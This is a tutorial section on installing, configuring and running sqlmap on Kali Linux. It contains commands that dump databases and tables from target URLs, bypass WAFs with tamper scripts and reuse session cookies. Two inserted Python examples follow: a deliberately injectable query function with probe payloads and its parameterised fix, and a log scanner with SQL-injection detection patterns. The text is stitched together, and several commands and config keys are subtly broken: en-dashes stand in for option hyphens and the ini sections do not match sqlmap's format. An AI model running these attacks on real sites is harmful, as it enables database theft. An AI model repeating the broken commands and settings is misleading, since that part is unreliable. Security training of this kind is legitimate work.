# sqlmap: The Ultimate Pentesting Course – Section 1/5: Installation & Configuration on Kali Linux
## Overview
In this section of the course, we will delve into the installation and configuration of sqlmap on Kali Linux, a powerful tool used for automated testing of SQL injection vulnerabilities. Next, we will explore how to effectively utilize sqlmap in real-world scenarios, alongside detailed explanations and examples.
## 1. Installation of sqlmap on Kali Linux
### 1.1 Prerequisites
Before we install sqlmap, ensure that your Kali Linux environment is updated and you have the necessary dependencies installed. Execute the following commands in your terminal:
"`bash
sudo apt update && sudo apt upgrade -y
"`
### 1.2 Installing sqlmap
Kali Linux typically comes with sqlmap pre-installed. To check if it's already available, run:
"`bash
sqlmap –version
"`
If sqlmap is not installed or you want to ensure you have the latest version, you can clone it from the official repository on GitHub:
"`bash
git clone https://github.com/sqlmapproject/sqlmap.git
"`
### 1.3 Navigating to sqlmap Directory
After cloning, navigate into the sqlmap directory:
"`bash
cd sqlmap
"`
### 1.4 Running sqlmap
You can run sqlmap directly from the cloned directory. Use the following command:
"`bash
python sqlmap.py
"`
If you encounter issues with Python 3, you can specify Python 2 with:
"`bash
python2 sqlmap.py
"`
**Note:** Make sure you have Python installed. You can install Python if needed by executing:
"`bash
sudo apt install python3
"`
## 2. Configuration
sqlmap does not require extensive configuration to get started, but certain configurations can enhance your experience.
### 2.1 Setting Up Proxy
For stealthy penetration testing, you might want to configure a proxy. You can set the proxy by creating a configuration file (for example `~/.sqlmap/sqlmap.conf`, in the same INI layout as the `sqlmap.conf` shipped in the repository) and adding the following under the `[Request]` section; sqlmap does not load the file on its own, so pass it with `-c ~/.sqlmap/sqlmap.conf` when you run it:
```ini
[Request]
proxy = http://127.0.0.1:8080
```
### 2.2 User Agent Configuration
Sometimes, it's necessary to change the User-Agent string to mimic different browsers. You can add the following line to your configuration file:
"`ini
[http]
user_agent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
"`
### 2.3 Setting Output Directory
If you plan on performing extensive tests, consider directing output to a specific directory for organization. Add this to your configuration:
"`ini
[output]
output_dir = /path/to/output/
"`
## 3. Step-by-Step Usage of sqlmap
### 3.1 Basic Usage
The simplest way to use sqlmap is to target a URL that you suspect may be vulnerable to SQL injection. Here is the basic syntax:
"`bash
python sqlmap.py -u "http://example.com/page.php?id=1"
"`
### 3.2 Verbose Mode
For detailed output, use the `-v` flag to specify verbosity levels (0-6):
"`bash
python sqlmap.py -u "http://example.com/page.php?id=1" -v 3
"`
### 3.3 Common Options
- **Detecting the Database Type**
To tell sqlmap which back-end database type to test for (it fingerprints the database automatically otherwise), use the `--dbms` option:
```bash
python sqlmap.py -u "http://example.com/page.php?id=1" --dbms=MySQL
```
- **Retrieving Database Names**
To list all databases:
```bash
python sqlmap.py -u "http://example.com/page.php?id=1" --dbs
```
### 3.4 Real-World Use Cases
#### Example 1: Extracting Data from a Vulnerable Application
Assume we have a typical vulnerable application. Here’s how you can extract user data:
"`bash
python sqlmap.py -u "http://vulnerable-website.com/user.php?id=1" –dump
"`
This command will extract all data from the tables that sqlmap discovers.
#### Example 2: Bypassing WAFs
Some web applications deploy Web Application Firewalls (WAFs). To bypass them, sqlmap allows you to modify the injection payloads. Use the `–tamper` option:
"`bash
python sqlmap.py -u "http://example.com/page.php?id=1" –tamper=space2comment
"`
### 3.5 Advanced Techniques
- **Using Cookies**
If authentication is required, you can pass cookies as follows:
```bash
python sqlmap.py -u "http://example.com/page.php?id=1" --cookie="PHPSESSID=xxxxxx"
```
- **Data Extraction with Specific Tables**
To retrieve data from a certain table, use:
```bash
python sqlmap.py -u "http://example.com/page.php?id=1" -T users --dump
```
## 4. Detailed Technical Explanations
sqlmap works by exploiting SQL injection vulnerabilities to execute arbitrary SQL commands on the back-end database. Below are some critical areas to understand:
### 4.1 Understanding SQL Injection
SQL injection occurs when an attacker is able to manipulate an SQL query by injecting malicious SQL code through user inputs. It's crucial to understand this vulnerability type to better defend against it.
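To make the vulnerability class concrete from the defender's side, here is an added example that is not part of the original course and not sqlmap's own code. It uses Python's built-in `sqlite3` module with an in-memory `users` table (constructed sample rows), a lookup that concatenates the `id` parameter into the query the way a `page.php?id=1` endpoint would, and the parameterised version that closes the hole. The function and table names are assumptions made for this example.

```python
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users (id, name, role) VALUES (?, ?, ?)",
        [(1, "alice", "admin"), (2, "bob", "user"), (3, "carol", "user")],
    )
    return conn


def lookup_user_vulnerable(conn, user_id):
    """Untrusted input pasted straight into the SQL text (hypothetical endpoint logic).

    This is the pattern behind targets like page.php?id=1: whatever the client
    sends becomes part of the statement, so a boolean condition such as
    '1 AND 1=2' changes the result set (the signal blind techniques rely on)
    and a UNION can append rows from a second query.
    """
    query = "SELECT name, role FROM users WHERE id = " + user_id
    return conn.execute(query).fetchall()


def lookup_user_safe(conn, user_id):
    """Validate the type, then bind the value as a parameter.

    Binding keeps data separate from SQL text, so the engine never parses the
    input as code; the int() check additionally rejects junk early with a
    clear error instead of silently returning an empty result.
    """
    uid = int(user_id)  # raises ValueError for anything that is not an integer
    return conn.execute("SELECT name, role FROM users WHERE id = ?", (uid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 AND 1=1", "1 AND 1=2", "1 OR 1=1",
                  "0 UNION SELECT name, role FROM users"):
        print("vulnerable", repr(probe), "->", lookup_user_vulnerable(db, probe))
    for probe in ("1", "1 OR 1=1"):
        try:
            print("safe", repr(probe), "->", lookup_user_safe(db, probe))
        except ValueError as exc:
            print("safe", repr(probe), "-> rejected:", exc)
```

Running the script shows the two responses sqlmap's boolean-based test compares: `1 AND 1=1` returns Alice's row, `1 AND 1=2` returns nothing, while the parameterised lookup returns the same single row for `1` and refuses anything that is not an integer.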
### 4.2 How sqlmap Operates
sqlmap automates the process of detecting and exploiting SQL injection vulnerabilities. It uses a series of tests that include:
- **Boolean-based blind SQL injection**
- **Error-based SQL injection**
- **Time-based blind SQL injection**
- **Union-based SQL injection**
Each method is employed depending on the response from the server.
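As an added, defender-side illustration of the four techniques just listed (not part of the original course and not sqlmap's code), the following Python script matches web-server access-log entries against one coarse signature per technique, collapses the `/**/` spacing that the `space2comment` tamper from Example 2 introduces so that tampered requests still match, and flags requests carrying sqlmap's default User-Agent. The log lines, IP addresses, timestamps and function names are all constructed for this example; the signatures are illustrative and would need tuning against a real application's traffic.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (not real traffic). 10.0.0.9 is a
# scanner using sqlmap's default User-Agent; 10.0.0.11 sends hand-edited
# payloads, one of them with space2comment-style /**/ spacing.
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "GET /page.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [12/Mar/2024:10:01:03 +0000] "GET /page.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.x#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [12/Mar/2024:10:01:04 +0000] "GET /page.php?id=1%20AND%201%3D2 HTTP/1.1" 200 498 "-" "sqlmap/1.x#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [12/Mar/2024:10:01:09 +0000] "GET /page.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/1.x#stable (https://sqlmap.org)"',
    '10.0.0.11 - - [12/Mar/2024:10:02:00 +0000] "GET /page.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL-- HTTP/1.1" 200 700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.11 - - [12/Mar/2024:10:02:01 +0000] "GET /page.php?id=1%2F%2A%2A%2FAND%2F%2A%2A%2F1%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.11 - - [12/Mar/2024:10:02:02 +0000] "GET /page.php?id=1%20AND%20extractvalue(1,concat(0x7e,version())) HTTP/1.1" 500 211 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.5 - - [12/Mar/2024:10:03:00 +0000] "GET /page.php?id=2 HTTP/1.1" 200 530 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# Apache/nginx "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# One coarse signature per technique from section 4.2 (illustrative only).
SIGNATURES = {
    "boolean-based": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I),
    "union-based": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}
SQLMAP_UA = re.compile(r"\bsqlmap\b", re.I)


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def normalise(path):
    """Undo URL encoding and collapse /**/ comments so tampered payloads match too."""
    decoded = unquote_plus(path)
    return re.sub(r"/\*.*?\*/", " ", decoded)


def classify(line):
    """Return {'ip', 'path', 'findings'} for one line, or None if it does not parse."""
    rec = parse_line(line)
    if rec is None:
        return None
    path = normalise(rec["path"])
    findings = [name for name, rx in SIGNATURES.items() if rx.search(path)]
    if SQLMAP_UA.search(rec["ua"]):
        findings.append("sqlmap-user-agent")
    return {"ip": rec["ip"], "path": path, "findings": findings}


def scan(lines):
    """Return only the records that triggered at least one finding."""
    return [r for r in map(classify, lines) if r and r["findings"]]


def suspicious_sources(lines, threshold=2):
    """Source IPs with at least `threshold` flagged requests, sorted."""
    counts = Counter(r["ip"] for r in scan(lines))
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for r in scan(LOG_LINES):
        print(r["ip"], r["findings"], r["path"])
    print("sources to review:", suspicious_sources(LOG_LINES))
```

Two design points matter in practice: decode and normalise before matching (the tampered `1/**/AND/**/1=1` request is only caught because `/**/` is collapsed to a space), and treat the User-Agent as corroboration rather than the main signal, since it is trivially changed (the `agent` setting in section 2.2 does exactly that) while the payload shapes are not.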
### 4.3 External Reference Links
– **sqlmap Official Documentation**: [sqlmap.org](https://sqlmap.org)
– **OWASP SQL Injection**: [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
– **Kali Linux Documentation**: [Kali Linux Documentation](https://www.kali.org/docs/)
---
This concludes the installation and configuration section of sqlmap on Kali Linux. In the next section, we will dive deeper into advanced usage techniques and case studies to strengthen your skills in ethical hacking using sqlmap.
Made by pablo rotem / פבלו רותם